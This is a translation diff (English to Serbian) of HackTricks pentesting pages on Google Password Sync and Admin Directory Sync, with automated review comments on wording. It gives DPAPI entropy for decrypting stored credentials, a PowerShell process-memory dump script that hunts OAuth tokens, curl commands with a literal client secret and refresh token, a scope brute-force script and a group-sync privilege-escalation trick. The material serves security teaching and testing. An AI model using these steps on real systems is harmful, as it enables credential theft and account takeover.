> [!CAUTION]
> It's not possible to give the new user the Super Amin role because the **refresh token doesn't have enough scopes** to give the required privileges.
> Nije moguće dodeliti novom korisniku Super Amin ulogu jer **osveženi token nema dovoljno opsega** da dodeli potrebne privilegije.
{{#include ../../../banners/hacktricks-training.md}}
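Review bot: the translated caution at `> Nije moguće dodeliti novom korisniku Super Amin ulogu` carries over the `Super Amin` typo from the English source; it should read `Super Admin` in both lines. The same line renders "refresh token" as `osveženi token`, while the rest of this file keeps the English term (`refresh token`, `access token` in `> Takođe, refresh token nije važeći u svakoj aplikaciji.`); pick one term, preferably the untranslated one since the API parameter is literally `refresh_token`. The two `curl` blocks (create user, add to group) are again re-added with identical content, a whitespace-only reindentation that inflates the diff without any translation change.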
@@ -2,57 +2,56 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Osnovne informacije
This is the binary and service that Google offers in order to **keep synchronized the passwords of the users between the AD** and Workspace. Every-time a user changes his password in the AD, it's set to Google.
Ovo je binarni fajl i servis koji Google nudi kako bi **održao sinhronizovane lozinke korisnika između AD** i Workspace-a. Svaki put kada korisnik promeni svoju lozinku u AD-u, ona se postavlja na Google.
It gets installed in `C:\Program Files\Google\Password Sync` where you can find the binary `PasswordSync.exe` to configure it and `password_sync_service.exe` (the service that will continue running).
Instalira se u `C:\Program Files\Google\Password Sync` gde možete pronaći binarni fajl `PasswordSync.exe` za konfiguraciju i `password_sync_service.exe` (servis koji će nastaviti da radi).
### GPS - Configuration
### GPS - Konfiguracija
To configure this binary (and service), it's needed to **give it access to a Super Admin principal in Workspace**:
Da biste konfigurisali ovaj binarni fajl (i servis), potrebno je **dati mu pristup Super Admin principalu u Workspace-u**:
- Login via **OAuth** with Google and then it'll **store a token in the registry (encrypted)**
- Only available in Domain Controllers with GUI
- Giving some **Service Account credentials from GCP** (json file) with permissions to **manage the Workspace users**
- Very bad idea as those credentials never expired and could be misused
- Very bad idea give a SA access over workspace as the SA could get compromised in GCP and it'll possible to pivot to Workspace
- Google require it for domain controlled without GUI
- These creds are also stored in the registry
- Prijavite se putem **OAuth** sa Google-om i zatim će **sačuvati token u registru (kriptovan)**
- Dostupno samo na kontrolerima domena sa GUI
- Dati neke **akreditivne podatke Servisnog naloga iz GCP** (json fajl) sa dozvolama da **upravljaju korisnicima Workspace-a**
- Veoma loša ideja jer ti akreditivi nikada ne isteknu i mogu se zloupotrebiti
- Veoma loša ideja dati SA pristup preko workspace-a jer bi SA mogao biti kompromitovan u GCP-u i moguće je prebaciti se na Workspace
- Google to zahteva za kontrolisane domene bez GUI
- Ovi akreditivi se takođe čuvaju u registru
Regarding AD, it's possible to indicate it to use the current **applications context, anonymous or some specific credentials**. If the credentials option is selected, the **username** is stored inside a file in the **disk** and the **password** is **encrypted** and stored in the **registry**.
Što se tiče AD-a, moguće je naznačiti da koristi trenutni **kontekst aplikacija, anonimno ili neke specifične akreditive**. Ako je opcija akreditiva izabrana, **korisničko ime** se čuva unutar fajla na **disku** a **lozinka** je **kriptovana** i čuva se u **registru**.
### GPS - Dumping password and token from disk
### GPS - Ispisivanje lozinke i tokena sa diska
> [!TIP]
> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even decrypt the password and token**.
> Imajte na umu da [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) može da detektuje **GPS**, dobije informacije o konfiguraciji i **čak dekriptuje lozinku i token**.
In the file **`C:\ProgramData\Google\Google Apps Password Sync\config.xml`** it's possible to find part of the configuration like the **`baseDN`** of the AD configured and the **`username`** whose credentials are being used.
U fajlu **`C:\ProgramData\Google\Google Apps Password Sync\config.xml`** moguće je pronaći deo konfiguracije kao što je **`baseDN`** AD-a koji je konfigurisan i **`username`** čiji se akreditivi koriste.
In the registry **`HKLM\Software\Google\Google Apps Password Sync`** it's possible to find the **encrypted refresh token** and the **encrypted password** for the AD user (if any). Moreover, if instead of an token, some **SA credentials** are used, it's also possible to find those encrypted in that registry address. The **values** inside this registry are only **accessible** by **Administrators**.
U registru **`HKLM\Software\Google\Google Apps Password Sync`** moguće je pronaći **kriptovani refresh token** i **kriptovanu lozinku** za AD korisnika (ako ih ima). Štaviše, ako se umesto tokena koriste neki **SA akreditivi**, takođe je moguće pronaći te kriptovane u toj adresi registra. **Vrednosti** unutar ovog registra su dostupne samo **Administratorima**.
The encrypted **password** (if any) is inside the key **`ADPassword`** and is encrypted using **`CryptProtectData`** API. To decrypt it, you need to be the same user as the one that configured the password sync and use this **entropy** when using the **`CryptUnprotectData`**: `byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 };`
Kriptovana **lozinka** (ako je ima) se nalazi unutar ključa **`ADPassword`** i kriptovana je koristeći **`CryptProtectData`** API. Da biste je dekriptovali, morate biti isti korisnik kao onaj koji je konfigurisao sinhronizaciju lozinke i koristiti ovu **entropiju** prilikom korišćenja **`CryptUnprotectData`**: `byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 };`
The encrypted token (if any) is inside the key **`AuthToken`** and is encrypted using **`CryptProtecData`** API. To decrypt it, you need to be the same user as the one that configured the password sync and use this **entropy** when using the **`CryptUnprotectData`**: `byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b };`\
Moreover, it's also encoded using base32hex with the dictionary **`0123456789abcdefghijklmnopqrstv`**.
Kriptovani token (ako ga ima) se nalazi unutar ključa **`AuthToken`** i kriptovan je koristeći **`CryptProtectData`** API. Da biste ga dekriptovali, morate biti isti korisnik kao onaj koji je konfigurisao sinhronizaciju lozinke i koristiti ovu **entropiju** prilikom korišćenja **`CryptUnprotectData`**: `byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b };`\
Štaviše, takođe je kodiran koristeći base32hex sa rečnikom **`0123456789abcdefghijklmnopqrstv`**.
The entropy values were found by using the tool . It was configured to monitor the calls to **`CryptUnprotectData`** and **`CryptProtectData`** and then the tool was used to launch and monitor `PasswordSync.exe` which will decrypt the configured password and auth token at the beginning and the tool will **show the values for the entropy used** in both cases:
Vrednosti entropije su pronađene korišćenjem alata. Konfigurisano je da prati pozive ka **`CryptUnprotectData`** i **`CryptProtectData`** i zatim je alat korišćen za pokretanje i praćenje `PasswordSync.exe` koji će dekriptovati konfigurisanju lozinku i auth token na početku, a alat će **prikazati vrednosti za korišćenu entropiju** u oba slučaja:
<figure><img src="../../../images/telegram-cloud-photo-size-4-5782633230648853886-y.jpg" alt=""><figcaption></figcaption></figure>
Note that it's also possible to see the **decrypted** values in the input or output of the calls to these APIs also (in case at some point Winpeas stop working).
Imajte na umu da je takođe moguće videti **dekriptovane** vrednosti u ulazu ili izlazu poziva ovih API-ja takođe (u slučaju da u nekom trenutku Winpeas prestane da radi).
In case the Password Sync was **configured with SA credentials**, it will also be stored in keys inside the registry **`HKLM\Software\Google\Google Apps Password Sync`**.
U slučaju da je Password Sync **konfiguran sa SA akreditivima**, takođe će biti sačuvani u ključevima unutar registra **`HKLM\Software\Google\Google Apps Password Sync`**.
### GPS - Dumping tokens from memory
### GPS - Ispisivanje tokena iz memorije
Just like with GCPW, it's possible to dump the memory of the process of the `PasswordSync.exe` and the `password_sync_service.exe` processes and you will be able to find refresh and access tokens (if they have been generated already).\
I guess you could also find the AD configured credentials.
Baš kao i sa GCPW, moguće je ispisati memoriju procesa `PasswordSync.exe` i `password_sync_service.exe` i moći ćete da pronađete refresh i access tokene (ako su već generisani).\
Pretpostavljam da biste takođe mogli pronaći konfigurirane akreditive za AD.
<details>
<summary>Dump <code>PasswordSync.exe</code> and the <code>password_sync_service.exe</code> processes and search tokens</summary>
<summary>Ispisivanje <code>PasswordSync.exe</code> i <code>password_sync_service.exe</code> procesa i pretraga tokena</summary>
```powershell
# Define paths for Procdump and Strings utilities
$procdumpPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\procdump.exe"
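Review bot: the bullet `- Google to zahteva za kontrolisane domene bez GUI` mistranslates the already garbled English `Google require it for domain controlled without GUI`; the intended meaning, clear from the neighbouring bullet `Dostupno samo na kontrolerima domena sa GUI`, is domain controllers without a GUI, so it should read `Google to zahteva za kontrolere domena bez GUI`. The sentence `Vrednosti entropije su pronađene korišćenjem alata.` inherits the missing tool name from the English `found by using the tool .`, where a link was evidently lost; restore the reference in the source rather than translating around the gap. Smaller fixes on the same lines: `ne isteknu` -> `ne ističu`, `konfigurisanju lozinku` -> `konfigurisanu lozinku`, and `konfigurirane akreditive` -> `konfigurisane akreditive` to match the ekavian forms used elsewhere in the file.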
@@ -61,8 +60,8 @@ $dumpFolder = "C:\Users\Public\dumps"
# Regular expressions for tokens
$tokenRegexes = @(
"ya29\.[a-zA-Z0-9_\.\-]{50,}",
"1//[a-zA-Z0-9_\.\-]{50,}"
"ya29\.[a-zA-Z0-9_\.\-]{50,}",
"1//[a-zA-Z0-9_\.\-]{50,}"
)
# Show EULA if it wasn't accepted yet for strings
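Review bot: the two regex entries in `$tokenRegexes` are re-added unchanged, so this hunk is whitespace-only; there is nothing to translate here and the reindentation should be dropped, or moved to a formatting commit, so the translation diff stays reviewable.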
@@ -70,7 +69,7 @@ $stringsPath
# Create a directory for the dumps if it doesn't exist
if (!(Test-Path $dumpFolder)) {
New-Item -Path $dumpFolder -ItemType Directory
New-Item -Path $dumpFolder -ItemType Directory
}
# Get all Chrome process IDs
@@ -79,94 +78,90 @@ $chromeProcesses = Get-Process | Where-Object { $processNames -contains $_.Name
# Dump each Chrome process
foreach ($processId in $chromeProcesses) {
Write-Output "Dumping process with PID: $processId"
& $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
Write-Output "Dumping process with PID: $processId"
& $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
}
# Extract strings and search for tokens in each dump
Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {
$dumpFile = $_.FullName
$baseName = $_.BaseName
$asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
$unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
$dumpFile = $_.FullName
$baseName = $_.BaseName
$asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
$unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
Write-Output "Extracting strings from $dumpFile"
& $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
& $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
Write-Output "Extracting strings from $dumpFile"
& $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
& $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
$outputFiles = @($asciiStringsFile, $unicodeStringsFile)
$outputFiles = @($asciiStringsFile, $unicodeStringsFile)
foreach ($file in $outputFiles) {
foreach ($regex in $tokenRegexes) {
foreach ($file in $outputFiles) {
foreach ($regex in $tokenRegexes) {
$matches = Select-String -Path $file -Pattern $regex -AllMatches
$matches = Select-String -Path $file -Pattern $regex -AllMatches
$uniqueMatches = @{}
$uniqueMatches = @{}
foreach ($matchInfo in $matches) {
foreach ($match in $matchInfo.Matches) {
$matchValue = $match.Value
if (-not $uniqueMatches.ContainsKey($matchValue)) {
$uniqueMatches[$matchValue] = @{
LineNumber = $matchInfo.LineNumber
LineText = $matchInfo.Line.Trim()
FilePath = $matchInfo.Path
}
}
}
}
foreach ($matchInfo in $matches) {
foreach ($match in $matchInfo.Matches) {
$matchValue = $match.Value
if (-not $uniqueMatches.ContainsKey($matchValue)) {
$uniqueMatches[$matchValue] = @{
LineNumber = $matchInfo.LineNumber
LineText = $matchInfo.Line.Trim()
FilePath = $matchInfo.Path
}
}
}
}
foreach ($matchValue in $uniqueMatches.Keys) {
$info = $uniqueMatches[$matchValue]
Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
}
}
foreach ($matchValue in $uniqueMatches.Keys) {
$info = $uniqueMatches[$matchValue]
Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
}
}
Write-Output ""
}
Write-Output ""
}
}
```
</details>
### GPS - Generating access tokens from refresh tokens
Using the refresh token it's possible to generate access tokens using it and the client ID and client secret specified in the following command:
### GPS - Generisanje pristupnih tokena iz osvežavajućih tokena
Korišćenjem osvežavajućeg tokena moguće je generisati pristupne tokene koristeći ga i ID klijenta i tajnu klijenta navedene u sledećoj komandi:
```bash
curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
--data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
https://www.googleapis.com/oauth2/v4/token
--data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
https://www.googleapis.com/oauth2/v4/token
```
### GPS - Scopes
> [!NOTE]
> Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
> Imajte na umu da čak i sa refresh token-om, nije moguće zatražiti bilo koji scope za access token jer možete zatražiti samo **scope-ove koje podržava aplikacija u kojoj generišete access token**.
>
> Also, the refresh token is not valid in every application.
> Takođe, refresh token nije važeći u svakoj aplikaciji.
By default GPS won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`:
Podrazumevano, GPS neće imati pristup kao korisnik svim mogućim OAuth scope-ovima, pa korišćenjem sledećeg skripta možemo pronaći scope-ove koji se mogu koristiti sa `refresh_token` za generisanje `access_token`:
<details>
<summary>Bash script to brute-force scopes</summary>
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
if ! curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
--data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
--data "scope=$scope" \
https://www.googleapis.com/oauth2/v4/token 2>&1 | grep -q "error_description"; then
echo ""
echo $scope
echo $scope >> /tmp/valid_scopes.txt
fi
echo -ne "Testing $scope \r"
if ! curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
--data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
--data "scope=$scope" \
https://www.googleapis.com/oauth2/v4/token 2>&1 | grep -q "error_description"; then
echo ""
echo $scope
echo $scope >> /tmp/valid_scopes.txt
fi
done
echo ""
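Review bot: the dump loop still refers to Chrome (`# Dump each Chrome process`, `$chromeProcesses`, `"$dumpFolder\chrome_$processId.dmp"`) although the block's summary says it dumps `PasswordSync.exe` and `password_sync_service.exe`; the comments and the dump filename prefix are leftovers from the GCPW script and should be renamed (e.g. `gps_$processId.dmp`) so the dumps can be told apart. In the same loop, `$matches = Select-String ...` assigns to PowerShell's automatic `$Matches` variable (the one populated by `-match`); it works but is confusing, so rename it to something like `$found`. The translated heading `### GPS - Generisanje pristupnih tokena iz osvežavajućih tokena` and its paragraph render "access token"/"refresh token" as `pristupnih tokena`/`osvežavajućeg tokena`, while the note a few lines below keeps `refresh token`/`access token`; use one term throughout. The scope brute-force script re-added at the end of the hunk has the same weakness as the GCDS copy: `! ... | grep -q "error_description"` counts an empty or failed `curl -s` response as a valid scope, so check for `"access_token"` instead, and the literal `refresh_token=1//03pJpHDWuak63...` value in both `curl` commands should be a placeholder rather than a committed credential.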
@@ -175,22 +170,15 @@ echo "Valid scopes:"
cat /tmp/valid_scopes.txt
rm /tmp/valid_scopes.txt
```
</details>
And this is the output I got at the time of the writing:
I ovo je izlaz koji sam dobio u vreme pisanja:
```
https://www.googleapis.com/auth/admin.directory.user
```
Which is the same one you get if you don't indicate any scope.
Koji je isti kao onaj koji dobijate ako ne navedete nikakav opseg.
> [!CAUTION]
> With this scope you could **modify the password of a existing user to escalate privileges**.
> Sa ovim opsegom možete **modifikovati lozinku postojećeg korisnika kako biste eskalirali privilegije**.
{{#include ../../../banners/hacktricks-training.md}}
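Review bot: `Koji je isti kao onaj koji dobijate ako ne navedete nikakav opseg.` and the caution `> Sa ovim opsegom možete ...` translate "scope" as `opseg`, whereas the note just above in this file keeps `scope`/`scope-ove` (`... možete zatražiti samo scope-ove koje podržava aplikacija ...`); keep one term, and since the parameter sent to the token endpoint is literally `scope=`, the untranslated one is the safer choice. The English caution also has `a existing user` -> `an existing user`, worth fixing in the source while the line is touched.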
@@ -2,60 +2,56 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Osnovne informacije
The main difference between this way to synchronize users with GCDS is that GCDS is done manually with some binaries you need to download and run while **Admin Directory Sync is serverless** managed by Google in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
Glavna razlika između ovog načina sinhronizacije korisnika sa GCDS je ta što se GCDS radi ručno sa nekim binarnim datotekama koje treba preuzeti i pokrenuti, dok je **Admin Directory Sync bezserverski** i upravlja njime Google na [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
At the moment of this writing this service is in beta and it supports 2 types of synchronization: From **Active Directory** and from **Azure Entra ID:**
U trenutku pisanja ovog teksta, ova usluga je u beta verziji i podržava 2 tipa sinhronizacije: Iz **Active Directory** i iz **Azure Entra ID:**
- **Active Directory:** In order to set this up you need to give **access to Google to you Active Directory environment**. And as Google only has access to GCP networks (via **VPC connectors**) you need to create a connector and then make your AD available from that connector by having it in VMs in the GCP network or using Cloud VPN or Cloud Interconnect. Then, you also need to provide **credentials** of an account with read access over the directory and **certificate** to contact via **LDAPS**.
- **Azure Entra ID:** To configure this it's just needed to **login in Azure with a user with read access** over the Entra ID subscription in a pop-up showed by Google, and Google will keep the token with read access over Entra ID.
- **Active Directory:** Da biste ovo postavili, potrebno je da **dajte pristup Google-u vašem Active Directory okruženju**. Kako Google ima pristup samo GCP mrežama (putem **VPC konektora**), potrebno je da kreirate konektor i zatim učinite svoj AD dostupnim iz tog konektora tako što ćete ga imati u VM-ovima u GCP mreži ili koristeći Cloud VPN ili Cloud Interconnect. Takođe, potrebno je da obezbedite **akreditiv** naloga sa pristupom za čitanje nad direktorijumom i **sertifikat** za kontakt putem **LDAPS**.
- **Azure Entra ID:** Da biste ovo konfigurisali, potrebno je samo da **prijavite se u Azure sa korisnikom koji ima pristup za čitanje** nad Entra ID pretplatom u iskačućem prozoru koji prikazuje Google, a Google će zadržati token sa pristupom za čitanje nad Entra ID.
Once correctly configured, both options will allow to **synchronize users and groups to Workspace**, but it won't allow to configure users and groups from Workspace to AD or EntraID.
Kada je pravilno konfigurisano, obe opcije će omogućiti **sinhronizaciju korisnika i grupa sa Workspace**, ali neće omogućiti konfiguraciju korisnika i grupa iz Workspace u AD ili EntraID.
Other options that it will allow during this synchronization are:
Druge opcije koje će biti omogućene tokom ove sinhronizacije su:
- Send an email to the new users to log-in
- Automatically change their email address to the one used by Workspace. So if Workspace is using `@hacktricks.xyz` and EntraID users use `@carloshacktricks.onmicrosoft.com`, `@hacktricks.xyz` will be used for the users created in the account.
- Select the **groups containing the users** that will be synced.
- Select to **groups** to synchronize and create in Workspace (or indicate to synchronize all groups).
- Slanje emaila novim korisnicima za prijavu
- Automatska promena njihove email adrese na onu koju koristi Workspace. Dakle, ako Workspace koristi `@hacktricks.xyz` a EntraID korisnici koriste `@carloshacktricks.onmicrosoft.com`, `@hacktricks.xyz` će biti korišćena za korisnike kreirane u nalogu.
- Odabir **grupa koje sadrže korisnike** koji će biti sinhronizovani.
- Odabir **grupa** za sinhronizaciju i kreiranje u Workspace (ili označavanje za sinhronizaciju svih grupa).
### From AD/EntraID -> Google Workspace (& GCP)
### Iz AD/EntraID -> Google Workspace (& GCP)
If you manage to compromise an AD or EntraID you will have total control of the users & groups that are going to be synchronized with Google Workspace.\
However, notice that the **passwords** the users might be using in Workspace **could be the same ones or not**.
Ako uspete da kompromitujete AD ili EntraID, imaćete potpunu kontrolu nad korisnicima i grupama koje će biti sinhronizovane sa Google Workspace.\
Međutim, imajte na umu da **lozinke** koje korisnici možda koriste u Workspace **mogu biti iste ili ne**.
#### Attacking users
#### Napad na korisnike
When the synchronization happens it might synchronize **all the users from AD or only the ones from a specific OU** or only the **users members of specific groups in EntraID**. This means that to attack a synchronized user (or create a new one that gets synchronized) you will need first to figure out which users are being synchronized.
Kada se sinhronizacija dogodi, može sinhronizovati **sve korisnike iz AD ili samo one iz specifične OU** ili samo **korisnike članove specifičnih grupa u EntraID**. To znači da da biste napali sinhronizovanog korisnika (ili kreirali novog koji se sinhronizuje), prvo ćete morati da saznate koji se korisnici sinhronizuju.
- Users might be **reusing the password or not from AD or EntraID**, but this mean that you will need to **compromise the passwords of the users to login**.
- If you have access to the **mails** of the users, you could **change the Workspace password of an existing user**, or **create a new user**, wait until it gets synchronized an setup the account.
- Korisnici mogu **ponovo koristiti lozinku ili ne iz AD ili EntraID**, ali to znači da ćete morati da **kompromitujete lozinke korisnika da biste se prijavili**.
- Ako imate pristup **mailovima** korisnika, mogli biste **promeniti Workspace lozinku postojećeg korisnika**, ili **kreirati novog korisnika**, sačekati da se sinhronizuje i postaviti nalog.
Once you access the user inside Workspace it might be given some **permissions by default**.
Kada pristupite korisniku unutar Workspace, može mu biti dodeljeno nekoliko **dozvola po defaultu**.
#### Attacking Groups
#### Napad na grupe
You also need to figure out first which groups are being synchronized. Although there is the possibility that **ALL** the groups are being synchronized (as Workspace allows this).
Takođe treba prvo da saznate koje se grupe sinhronizuju. Iako postoji mogućnost da se **SVE** grupe sinhronizuju (jer Workspace to omogućava).
> [!NOTE]
> Note that even if the groups and memberships are imported into Workspace, the **users that aren't synchronized in the users sychronization won't be created** during groups synchronization even if they are members of any of the groups synchronized.
> Imajte na umu da čak i ako su grupe i članstva uvezena u Workspace, **korisnici koji nisu sinhronizovani u sinhronizaciji korisnika neće biti kreirani** tokom sinhronizacije grupa čak i ako su članovi bilo koje od sinhronizovanih grupa.
If you know which groups from Azure are being **assigned permissions in Workspace or GCP**, you could just add a compromised user (or newly created) in that group and get those permissions.
Ako znate koje grupe iz Azure su **dodeljene dozvole u Workspace ili GCP**, mogli biste jednostavno dodati kompromitovanog korisnika (ili novokreiranog) u tu grupu i dobiti te dozvole.
There is another option to abuse existing privileged groups in Workspace. For example, the group `gcp-organization-admins@<workspace.email>` usually has high privileges over GCP.
Postoji još jedna opcija za zloupotrebu postojećih privilegovanih grupa u Workspace. Na primer, grupa `gcp-organization-admins@<workspace.email>` obično ima visoke privilegije nad GCP.
If the synchronization from, for example EntraID, to Workspace is **configured to replace the domain** of the imported object **with the email of Workspace**, it will be possible for an attacker to create the group `gcp-organization-admins@<entraid.email>` in EntraID, add a user in this group, and wait until the synchronization of all the groups happen.\
**The user will be added in the group `gcp-organization-admins@<workspace.email>` escalating privileges in GCP.**
Ako je sinhronizacija iz, na primer, EntraID, u Workspace **konfigurisana da zameni domen** uvezenog objekta **sa email-om Workspace**, biće moguće za napadača da kreira grupu `gcp-organization-admins@<entraid.email>` u EntraID, doda korisnika u ovu grupu i sačeka da se sinhronizacija svih grupa dogodi.\
**Korisnik će biti dodat u grupu `gcp-organization-admins@<workspace.email>` eskalirajući privilegije u GCP.**
### From Google Workspace -> AD/EntraID
### Iz Google Workspace -> AD/EntraID
Note that Workspace require credentials with read only access over AD or EntraID to synchronize users and groups. Therefore, it's not possible to abuse Google Workspace to perform any change in AD or EntraID. So **this isn't possible** at this moment.
Imajte na umu da Workspace zahteva akreditive sa pristupom samo za čitanje nad AD ili EntraID da bi sinhronizovao korisnike i grupe. Stoga, nije moguće zloupotrebiti Google Workspace da bi se izvršila bilo kakva promena u AD ili EntraID. Dakle, **to nije moguće** u ovom trenutku.
I also don't know where does Google store the AD credentials or EntraID token and you **can't recover them re-configuring the synchronizarion** (they don't appear in the web form, you need to give them again). However, from the web it might be possible to abuse the current functionality to **list users and groups**.
Takođe ne znam gde Google čuva AD akreditive ili EntraID token i ne **možete ih povratiti ponovnom konfiguracijom sinhronizacije** (ne pojavljuju se u web formi, morate ih ponovo uneti). Međutim, putem web-a može biti moguće zloupotrebiti trenutnu funkcionalnost da **prikazujete korisnike i grupe**.
{{#include ../../../banners/hacktricks-training.md}}
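Review bot: `Ako znate koje grupe iz Azure su dodeljene dozvole u Workspace ili GCP` is ungrammatical and shifts the meaning (the groups are not being assigned; permissions are assigned to them); it should read `Ako znate kojim grupama iz Azure-a su dodeljene dozvole u Workspace-u ili GCP-u`. Two verb forms in the bullet list are also off: `potrebno je da dajte pristup Google-u` -> `potrebno je da date pristup Google-u`, and `potrebno je samo da prijavite se u Azure` -> `potrebno je samo da se prijavite u Azure`. Minor: `akreditiv naloga` should be plural `akreditive naloga` to match "credentials", and `To znači da da biste napali` reads better as `To znači da, da biste napali`.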